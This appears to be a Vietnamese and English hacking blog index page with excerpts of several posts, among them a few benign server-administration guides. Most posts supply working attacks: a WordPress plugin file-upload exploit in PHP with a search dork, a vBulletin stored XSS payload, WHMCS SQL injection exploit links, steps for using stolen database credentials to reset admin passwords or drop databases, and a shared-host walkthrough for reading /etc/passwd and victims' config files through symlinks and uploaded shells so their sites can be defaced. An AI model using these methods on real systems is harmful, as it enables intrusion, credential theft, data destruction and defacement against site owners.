Trang

Bypass Symlink Work 100% By Mauritania Attacker Private!


You can Bypass any server with this method you just need to do some little changes in the following file :

* php.ini

* and bypass suEXEC

For example i have this simple "php.ini" 

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On


Just add these to "disable_functions ="

"ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"

So our "php.ini" will be like this :

safe_mode = Off
disable_functions = "ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

Some examples of screenshots in Whm ;)




553067_10151303602567035_1828598650_n

562177_10151303602677035_853140348_n

63909_10151303602817035_1919120495_n
Note: This Method was tested on Ovh & Bluehost servers and it successfully bypassed them!
Follow: http://www.hackerzadda.com/2013/03/bypass-symlink-100.html

Xem Thêm

 

[eBook] HTML and PHP Tutorials

HTML Web Programming and Designing

HTML (Hyper Text Markup Language) is the web Programming language the most most most useful and useable Web Programming language, Programmer, hacker, developer everyone need to learn HTML. HTML is the Source and Base of all Web Programming languages, If you don't know HTML then you can't learn any Web Programming lang. 

 

PHP + SQL + SQLi Programming

As you know that SQL is a Programming lang. of Database (Structured Query Language) without SQL, we can't login to any website and access our files. SQL is the most useable Pogramming lang. SQL is only use for Database Structuring storing info data. Now PHP (Hypertext Pre-processor or Personal Home Page) PHP is widely used in web applications to connect with Server, Web Applications and SQL DB. PHP is really very useful in Web Programming world, without PHP there could be nothing. Every Hackers need to learn PHP,SQL and SQLI (SQL Injection).

Xem Thêm

 

Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability

Exploit :

Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>





Shell Upload Access Path : http://wordpress.localhost:8080/wp-c...2013/09/up.php

Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/

Xem Thêm

 

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

HTML Code:
##########################################################################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility. 
# Intended for authorized web application pentesting only!
#
######################################################################################

Xem Thêm

 

Alert load on your VPS/Server - Cảnh báo VPS/Server quá tải

Xin chào,

Hôm nay mình xin chia sẻ 1 scripts rất tiện ích cho các bạn đang sử dụng VPS/Server. Đối với những bạn mới tập tành tìm hiểu về VPS/Server thì việc kiểm tra nó thường xuyên rất là mệt.

Chức năng mã nguồn là sẽ thông báo email cho bạn về thông tin VPS/Server đang bị quá tải.



Thông báo chi tiết:
- Top 20 process sử dụng cao nhất
- Top 10 process sử dụng cao nhất
- Trạng thái Memory và Swap hiện tại
- Các network đang hoạt động
- Chi tiết HDD
Đầu tiên bạn tạo 1 file với tên gọi là loadalert.sh có thể dùng "nano" hoặc "vi" để dán mã nguồn ở dưới.

Xem Thêm

 

Cấu hình Wordpress + WP Super Cache + Cloudflare trên nginx

Mở file vhost của tên miền lên, chúng ta sẽ thấy có đoạn

Code:
index index.php index.html index.htm;
        server_name abc.com;
 
        location / {
        try_files $uri $uri/ /index.php?$args;
          }
Sửa nó thành như sau

Code:
 index index.php index.html index.htm;
      server_name abc.com cdn.abc.com;
 
    set $cache_uri $request_uri;
 
    if ($request_method = POST) {
        set $cache_uri 'null cache';
    }
    if ($query_string != "") {
        set $cache_uri 'null cache';
    }
    if ($request_uri ~* "(/wp-admin/|/xmlrpc.php|/wp-(app|cron|login|register|mail).php|wp-.*.php|/feed/|index.php|wp-comments-popup.php|wp-links-opml.php|wp-locations.php|sitemap(_index)?.xml|[a-z0-9_-]+-sitemap([0-9]+)?.xml)") {
        set $cache_uri 'null cache';
    }
    if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_logged_in") {
        set $cache_uri 'null cache';
    }
    location / {
        try_files /wp-content/cache/supercache/$http_host/$cache_uri/index.html $uri $uri/ /index.php;
    }
Restart lại nginx để cập nhật

Code:
service nginx restart
Cấp quyền cho nginx lên root document nếu các bạn chưa làm

Code:
chown -R nginx:nginx /home/abc.com/public_html
Cấu hình WP Super Cache

Các bạn đăng nhập vào admincp của wp, tìm đến các thiết lập liên quan đến wp super cache. Như của mình thì thấy như sau



Nhìn cái bảng màu vàng ghê ghê, các bạn mặc kệ nó, do php còn lưu cache nên nó chưa thấy đc giá trị wp super cache add vào file wp-config.php.

Các bạn tick vào Caching On, bấm update status, xong chạy lệnh sau để recache các file php

Code:
service php-fpm restart
tiếp theo bấm vào test cache để xem nó đã hoạt động hay chưa


Chuẩn rồi, mọi thứ đều đã hoạt động, giờ các bạn chuyển qua tab Advanced, thấy có rất nhiều tùy chọn, ừ thì cái nào có chữ recommended thì chọn trước, rồi sau đó sẽ xem xét tiếp



Xong thì các bạn bấm nút Update Status, sẽ lại xuất hiện mấy bảng cảnh báo như sau


Lỗi gì thế? và cách khắc phục như thế nào ? Đây không phải là lỗi, plugin này nó check mod_rewrite của apache nên đương nhiên nó nghĩ rằng server chưa cài đặt mod đó. Mà đúng là server chưa cài thật, vì chúng ta có sử dụng apache đâu

Thế thì, ừ kệ nó, nó báo gì kệ nó, nginx đã được chúng ta config chuẩn trước đó rồi, nên các bạn cứ yên tâm là plugin hoạt động rất tốt, ko hề lỗi lầm j

Tab Advanced là nơi chúng ta kết hợp wp super cache và config ở server, tiếp theo qua tab CDN sẽ là nơi chúng ta kết hợp giữa wordpress và cloudflare




Các bạn nhớ tick vào ô Enable CDN Support rồi sau đó setup như hình.


Đối với giá trị ở ô Include directories, mình để ý thấy 1 số bạn có thư mục HLIC chứa rất nhiều hình ảnh, các bạn nhớ thêm cả thư mục đó vào

Đối với ô Additional CNAMES, chúng ta thêm các sub mà chúng ta sẽ dùng để cdn phụ, đối với những trang có nhiều hình ảnh, js, css tĩnh, các cdn phụ này sẽ giúp cải thiện tốc độ tải trang đáng kể so với chỉ sử dụng 1 sub CDN

Cấu hình cloundflare

Bước cuối cùng là cấu hình ở cloudflare.com, các bạn đăng nhập vào và chắc chắn rằng dns setting của bạn đã có dạng như thế này


Tiếp theo chúng ta back trở lại danh sách tên miền đang dùng tại cloudflare (https://www.cloudflare.com/my-websites) sau đó chọn cloudflare settings cho tên miền tương ứng mà chúng ta muốn thiết lập


Sau đây là một số gợi ý của mình dành cho các bạn
VHB

Xem Thêm

 

Up Shell khi đã có user pass database

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao

+ có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao
Đặt ra nhiều trường hợp ( biết vận động cái đầu chút )
nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và pass ( điều nầy thì ko cần nói nhiều)
Nhưng nó dùng cpanel thì sao , cái này mới khốn ( trường hợp không có shell nhé)
_ Giải pháp cho mấy bé đây
+ xác định ip và tìm sẵn link admin ( nếu là vbb khi khỏi có cách upload shell qua data)
+ Máy cài visual 2010 hay bản bao nhiêu thì tùy
+http://dev.mysql.com/downloads/connector/net/1.0.html download bản này về import vào C# , để khai báo thư viện MySql
+ Việc đơn giản còn lại là kết nối với data mà ta đã vô tình hoặc trộm cắp ở đâu thì tùy với câu lệnh kết nối vào Mysql như sau
================================

String connString = "Server = IP host đã xác định bước trên ; Database = data đã trôm được;Port = 3306 ( cổng kết nối của Mysql); User ID = User Mysql;Password";
MySqlConnection conn = new MySqlConnection(connString);
MySqlCommand Command();
Conman = conn.CreateCommand();
Command.CommandText = "Câu Lệnh SQL"; //

ví dụ như
UPDATE `user` SET "password" = "69e53e5ab9536e55d31ff533aefc4fbe'", salt = "p5T" WHERE `userid` = "1"

còn chơi khăm hơn thì

DROP DATABASE `tên data`;

và Nhấn F5 xem thành quả thâu :v

thực chất ra đây cũng chỉ là 1 chút tư duy trong hacking thôi .....Quan trọng là biết cách suy nghĩ

còn đây là video UpShell qua database

Sẽ ra mắt tools connect Mysql và Auto UpLoad Shell for VBB

_ 1 vài video tìm lại
_Video Bypass Chatbox WorldOfHacked =))
http://www.mediafire.com/download/88olep119kiqy1o/bypasschatbox.rar
+ Hack Tiền quán nét
http://www.mediafire.com/download/qglc9r4jt5cnl1u/tmt_cheattime.rar
Ưu điểm có thể gian lận đc nếu biết cách
Nhược điểm : chủ quán biết là chỉ có ăn dép thẳng vào mồm
_Hack Shop Auto V5
http://www.mediafire.com/download/drhi5o3nsc9tblt/hackshop.rar
Chỉ là dùng 1 đoạn java nhỏ để Get Table và colums
_Upload Shell PhpMyadmin
http://www.mediafire.com/download/463c3r7k33f1vzx/upshell.rar
_Local Id Apache
http://www.mediafire.com/download/dtu9zb8u6zkf9gy/local_apache.rar
_Và mấy thằng bợn nhợn chúng nó khai thác web DAV như thế nào
http://www.mediafire.com/download/4b1a1d45o7pk7kw/exploit_server_win_DAV.rar
_Test Local Attack qua FXPFlash
http://www.mediafire.com/download/h3lmylp39so4w95/bypassflasfxp.rar

Xem Thêm

 

Whmcs 5.2.7 sqli injection

So, Friends and Enemies :p here is the Lastest Vulnerability Leaked in Black Hackers Market for WHMCS

Vulnerability Effects:

/includes/dbfunctions.php:

<?php function update_query($table, $array, $where) { #[...] if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .= $value.','; continue; } #[...] $result = mysql_query($query, $whmcsmysql); } ?> and download exploit from following link Exploit in python: http://www.mediafire.com/download/be...t4scl/whmcs.py Exploit in php: http://www.mediafire.com/download/5y10bzblp9bo92q/cyberaon(2).php Register a new user on a target WHMCS install (/register.php)
and edit the exploit with site name, email and password.

Vietnamese version :

hào các bạn,

Ngay từ khi WHMCS, một mã nguồn quản lý hosting khá nổi tiếng cho ra mắt bản 5.2.7, hãng này đã bỏ qua một lỗ hỏng bảo mật khá nghiêm trọng trong việc khai báo các hàm kết nối cho mysql "dbfunction.php"

/includes/dbfunctions.php:


PHP Code:
<?php
function update_query($table, $array, $where) {
#[...]
if (substr($value, 0, 11) == 'AES_ENCRYPT') {
$query .= $value.',';
continue;
}
#[...]
$result = mysql_query($query, $whmcsmysql);
}
?>


Sau khi test trên một script SQLI hoặc một python tương tự, kết quả trả về như thế này sau khi exploit ...

Script dùng exploit ..

Download tại : https://minhkhang.org/dl.php?type=d&id=8
hoặc đính kèm: http://sinhvienit.net/forum/attachme...cs_exploit.zip

Xem Thêm

 

Linux Advance

- Để đáp ứng nhu cầu tìm hiểu của những ai thật sự muốn tìm hiểu, bắt đầu từ hôm nay mình sẽ post lần lượt từng bài lab của chương trình Linux Advance. Mỗi tuần post một bài nhé . (Xem nội dung chương trình Linux Advance trên trang Nhất Nghệ)

- Mục tiêu đề ra là: Xây dựng một hệ thống DataBase Server, Web Server và Firewall chạy ở chế độ Load Balancing trên nền Linux với mức độ "available" đến 99%.

- Sẽ post tuần tự từng bài lab theo thứ tự sau:

Bài Lab 1: Building MySQL Database Replication
Bài Lab 2: Building Linux Cluster
Bài Lab 3: Building MySQL Database Replication và Failover
Bài Lab 4: Building Web Servers kết nối đến Database Servers
Bài Lab 5: Building Web Servers Load Balacing & Failover
Bài Lab 6: Building Firewall server
Bài Lab 7: Building Firewall Load Balancing & Failover.

http://up.4share.vn/f/4c7f7d7b7c75797d/L...dvance.doc
CEH

Xem Thêm

 

1 số cơ bản của local

Ok, giờ giả sử chúng ta đã có 1 con shell trên sv. Chúng ta bắt đầu vào việc nào

Trước tiên chúng ta xem sv này có những site nào.

1 số dịch vụ check Reverse IP free như: http://www.ip-adress.com/reverse_ip/

http://domainsbyip.com

….. còn nhiều nữa ….

I/ Trường hợp dễ nhất, sv chưa config bảo mật gì hết

Chúng ta hãy nhìn hình bên dưới đây:



Chúng ta thấy gì nào:

Safe_Mode: OFF Open_Basedir: NONE Safe_Exec_Dir: /usr/bin Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.13 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : NONE

Vậy tức là sv này không config gì cả.

Vậy thì chúng ta có thể chạy các lệnh cơ bản như sau:

cat – lệnh để đọc file, cấu trúc cat <đường dẫn file trong sv> (VD: cat /home/user/public_html/includes/config.php)
dir – lệnh này có tác dụng chuyển đường dẫn thực thi, có dạng dir <đường dẫn>
cd – lệnh này có tác dụng chuyển đổi thư mục, có dạng cd

Vậy thì ko có gì khó nữa rồi. Chúng ta bắt đầu chạy lệnh đầu tiên:

cat /etc/passwd -> Bấm execute

(Trong 1 số trường hợp không được, bạn hãy thử: less /etc/passwd)

………

1 danh sách lù mù bắt đầu hiện ra. Ồ, hay ghê. Bắt đầu nhìn kĩ nào

Kéo xuống

Kéo xuống

À à…. bên dưới bắt đầu xuất hiện những dòng dạng như:

user_name_cua_victim :1076:1076:System User for user_name_cua_victim:/home/user_name_cua_victim/:/sbin/nologin

Vậy là xong rồi, bây giờ bạn đã biết user name của victim là gì, suy ngay ra đường dẫn tới nhà của nó. Việc còn lại là đọc file config của victim bằng lệnh:

cat /home/user_name_cua_victim/public_html/config.php

Sau khi có được được thông tin về CSDL của victim rồi, bạn có thể chiếm quyền admin và Deface website của hắn

II/ Trường hợp SV bật Safemode=0ff | Vô hiệu hóa vô số hàm | Không thể chạy các lệnh cơ bản được !

Ây chà, sau khi bạn thấy sv như vậy, ko thể chạy kác lệnh cơ bản này nữa.

Theo mình thì đầu tiên hãy thử vận may với phương pháp: Local viaSQL

Tiến hành thế nào ???

Tuy sv ko cho view file từ site khác nhưng với quyền hạn của con shell, chúng ta vẫn có thể view file của site chứa con shell đó.

Vậy ! Chúng ta hãy tìm tới file config của site (Trong shell có chức năng change Work directory và edit file. Bạn hãy thay đổi đường dẫn phù hợp để đọc được file config) và đăng nhập vào CSDL của site qua con chức năng của con shell. Kéo xuống sẽ có giống như hình bên dưới:



Xong, sau khi chúng ta đã login thành công được vào CSDL. Đầu tiên chúng ta hãy creat 1 Table riêng cho tiện. Cấu trúc để chạy như sau:

create table daica (dc varchar(1024));

(bạn thay đổi “daica” và “dc” cũng đc)

Sau đó chúng ta chạy tiếp lệnh:

load data local infile ‘/etc/passwd’ into table daica

( Có nghĩa là: Tải dữ liệu từ: /etc/passwd vào bảng: daica ) /etc/passwd là gì thì bên trên bạn đã thấy ồi đúng ko, nó có tác dụng liệt kê danh sách user trong server.

Nếu SV cho phép chạy lệnh này. Thì data sẽ được load vào table của chúng ta. Giờ hãy chạy lệnh:

select * from daica

( Có nghĩa là: chọn ra tất cả từ table(bảng) daica )

Ồ !!! Thấy gì nào !!! Nó lại hiện ra giống như lúc chúng ta chạy lệnh cat /etc/passwd

OK ! Giờ chúng ta lại xác định được user rồi. Chúng ta sẽ load dữ liệu từ file cần đọc về table của chúng ta.

Câu lệnh tương tự: ( Theo mình nên creat table mới cho tiện)

load data local infile ‘/home/username/public_html/config.php’ into table daica

Rồi bây giờ chỉ việc view table đó sẽ thấy file thôi.

!!! KẾt thúc !!!

**************************************

Giờ đến trường hợp SV của chúng ta không cho phép thực thi những lệnh trên !!!

Làm thế nào đây. Cách đầu tiên chúng ta nghĩ tới đó là sẽ hạ Safemode xuống để sv trở về dạng 1. Cách làm như thế nào?

Bạn tạo 1 file: php.ini có nội dung như sau:

safe_mode = off

disable_function = none

Sau đó up lên folder của con shell…… và xem kết quả …… Ồ !!! Đúng là nó về dạng 1 thật nếu sv cùi thì sau khi bypass safe mode như vậy, chúng ta lại có thể thực thi những lệnh cơ bản như bình thường.

Nhưng nếu không thì sao !!!

Nếu không, bạn hãy nghĩ ngay đến 1 cách nữa rất hữu hiệu. Đó là: SymLink

Symlink là gì ? Nó viết tắt của symbolic link ! Nó sẽ giống như chúng ta tạo 1 shortcut trên window vậy, giúp chúng ta view đc file. Câu lệnh của nó như sau:

ln -s <đường dẫn tới file cần đọc> <đường dẫnfile được ghi>

Ví dụ: ln-s /home/user/public_html/config.php daica.txt

( Đơn giản đi chỉ là daica.txt -> File này trùng luôn folder với con shell )

Tới đây thì các bạn cũng hiểu rồi chứ ! lại bắt đầu nào:

ln-s /home/user/public_html/config.php daica.txt

http://sitecuavictim.com/duongdanfoldershell/daica.txt

Nếu view được thì thôi ko sao. Nếu nó lại báo lỗi: 403 thì hãy thử:

Upload 1 file .htaccess lên ngang hàng con shell có nội dung:

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

-> sau đó view lại xem

************************************************** **xong

Vậy tất cả các cách trên đều không được nữa !!! Thì sao !!!

Chà ! Tới đây chúng ta sẽ thử sử dụng 1 source shell khác, đó là shell cgi, perl ( shell có đuôi .cgi .pl )

Đầu tiên hãy upload file shell .cgi hoặc shell.pl lên ( Các bạn có thể lấy shell này từ :


Sau đó chmod 755 cho con shell này

Và chạy nó ……………………

Nếu chạy được !!! thì quá tuyệt rồi. Các bạn có thể dùng các lệnh cơ bản giống như trường hợp 1 -> xong film


Nguồn Theo VHB

Xem Thêm

 

Auto Khai Thác SQL Injection (Update)

I- JS Khai thác sqli







Download Code:
-úp file js lên hosting.
-sử link js trong sript sau:
Quote:
<script src='http://link.com/sqli.js'></script>
VD:

Quote:
<script src='http://thptquangha.com/sqli.js'></script>
-sau đó convert đoạn sript trên sang hex.
- ta được :
Quote:
3c736372697074207372633d27687474703a2f2f7468707471 75616e6768612e636f6d2f73716c692e6a73273e3c2f736372 6970743e

- dùng nó trong thẻ sau:


concat((0x mã hex))vnhack

VD:
Quote:
concat((0x3c736372697074207372633d27687474703a2f2f 746870747175616e6768612e636f6d2f73716c692e6a73273e 3c2f7363726970743e))vnhack
- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).

-VD với js trên :
=======================================


II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên






download:
Quote:
http://kemlam.com/?content=detail&pr...,9,10,11,12,13

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương